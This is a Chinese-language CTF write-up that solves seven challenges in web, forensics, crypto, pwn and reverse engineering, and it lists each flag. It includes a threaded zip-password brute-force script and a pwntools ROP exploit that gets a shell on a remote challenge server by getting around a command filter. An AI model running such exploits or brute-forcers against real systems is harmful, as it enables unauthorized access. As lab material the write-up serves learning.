1 爬虫协议
启动环境,看到提示robots访问/robots.txt
从Disallow中获取到三个路径,访问第三个路径
Apache的文件浏览UI,访问该文件,得到flag
flag{73d6c4c4-184b-4a3b-9b7a-d8b12e7a0def}
2 Packet
下载附件,使用wireshark打开,筛选http协议,可以看到是一句话木马,追踪http流
往下查照,在第16个包中命令为cat flag后base64编码
解base64编码后得到flag
flag{7d6f17a4-2b0a-467d-8a42-66750368c249}
3 缺失的数据
下载附件后得到一个盲水印加密脚本lose.py,一个做过盲水印的图片newImg.png和带密码的压缩包orign.zip
压缩包中的secret.txt不带密码,猜测是压缩包密码的字典
爆破脚本如下
import pyzipper from threading import Thread def extractFile(zip_file, password): with pyzipper.AESZipFile(zip_file, 'r', compression=pyzipper.ZIP_LZMA, encryption=pyzipper.WZ_AES) as f: f.setpassword(password.encode('utf-8')) try: f.extractall() #使用密码尝试解压 print("[+] Found password: " + password) except: pass #解压失败说明密码错误,跳过 def main(): # 采用AES默认加密算法的压缩文件 zip_file_name = "orign.zip" # 字典文件,每行为一个密码 dict_name = "secret.txt" dict_file = open(dict_name) for line in dict_file.readlines(): password = line.strip()#NYNUCTF SP # 启用一个线程去解压 t = Thread(target=extractFile, args=(zip_file_name, password)) t.start() if __name__ == '__main__': main()
随后查看盲水印脚本,发现加解密都有,所以只需要微调即可解密,修改后的脚本如下
由于主机python环境缺少库,转到ubuntu虚拟机运行,运行可得到水印图片,即得到flag
import cv2 //导入opencv库 import pywt //导入pywt库 import numpy as np //导入numpy库 class WaterMarkDWT: def __init__(self, origin: str, watermark: str, key: int, weight: list): self.key = key self.img = cv2.imread(origin) self.mark = cv2.imread(watermark) self.coef = weight def arnold(self, img): r, c = img.shape p = np.zeros((r, c), np.uint8) a, b = 1, 1 for k in range(self.key): for i in range(r): for j in range(c): x = (i + b * j) % r y = (a * i + (a * b + 1) * j) % c p[x, y] = img[i, j] return p def deArnold(self, img): r, c = img.shape p = np.zeros((r, c), np.uint8) a, b = 1, 1 for k in range(self.key): for i in range(r): for j in range(c): x = ((a * b + 1) * i - b * j) % r y = (-a * i + j) % c p[x, y] = img[i, j] return p def get(self, size: tuple = (1200, 1200), flag: int = None): img = cv2.resize(self.img, size) img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY) c = pywt.wavedec2(img2, 'db2', level=3) [cl, (cH3, cV3, cD3), (cH2, cV2, cD2), (cH1, cV1, cD1)] = c d = pywt.wavedec2(img1, 'db2', level=3) [dl, (dH3, dV3, dD3), (dH2, dV2, dD2), (dH1, dV1, dD1)] = d a1, a2, a3, a4 = self.coef ca1 = (cl - dl) * a1 ch1 = (cH3 - dH3) * a2 cv1 = (cV3 - dV3) * a3 cd1 = (cD3 - dD3) * a4 waterImg = pywt.waverec2([ca1, (ch1, cv1, cd1)], 'db2') waterImg = np.array(waterImg, np.uint8) waterImg = self.deArnold(waterImg) kernel = np.ones((3, 3), np.uint8) if flag == 0: waterImg = cv2.erode(waterImg, kernel) elif flag == 1: waterImg = cv2.dilate(waterImg, kernel) cv2.imwrite('水印.png', waterImg) return waterImg if __name__ == '__main__': img = 'a.png' k = 20 xs = [0.2, 0.2, 0.5, 0.4] waterImg = "newImg.png" //传入盲水印处理过后的图片newImg.png W1 = WaterMarkDWT(img, waterImg, k, xs) W1.get() //调用WaterMarkDWT的get方法生成水印图片
flag{e642820a-44c0-4c7d-a259-68b15aca8840}
4 cc
打开html,cyberchef,进行了AES的CBC编码,KEY和IV均已标出
解铃还须系铃人,使用cyberchef解码即可解出flag
flag{6500e76e-15fb-42e8-8f29-a309ab73ba38}
5 Theorem
查看task.py
发现有d1,d2,本来猜测是共模攻击,但是发现d1,d2没有参与加密过程,直接yafu分解N,拿到p、q后使用工具即可解出明文
flag{5f00e1b9-2933-42ad-b4e1-069f6aa98e9a}
6 fd
下载附件,checksec,发现开启了部分RELRO和NX。
查看check函数,可以看到这里过滤了部分输入
过滤了cat和b s / i n 五个字符,所以无法直接/bin/sh获取shell,这里使用system(“more
获取到shell后,发现涉及到文件读写命令均提示bad file descriptor,或者I/O Error,结合题意后应该是因为题目本身需要使用I/O Pipe链接,但是这里使用了机器码链接shell。所以这里借用php的绕过方法,定义三个变量
from pwn import * #r=process() #elf = ELF("/pwn") r=remote("47.93.142.240", 33670) context(os='linux',arch="amd64",log_level='debug') ret=0x00000000004005ae pop_rdi_ret=0x0000000000400933 system=0x4005d0 infoaddr=0x601090 r.sendlineafter("restricted stack.\n","\x24\x30") p=flat(b'a'*(0x20+8),ret,pop_rdi_ret,infoaddr,system,word_size=64) r.sendlineafter("...\n",p) r.interactive()
flag{b84facc3-95fc-4c4a-9584-1d12ad98d9a8}
7 RC4
32位文件,拖入IDA查看
正向加密RC4,和去年的题目雷同,在加密函数后打断点
运行完毕后查看v5数组的值即为flag
flag{12601b2b-2f1e-468a-ae43-92391ff76ef3}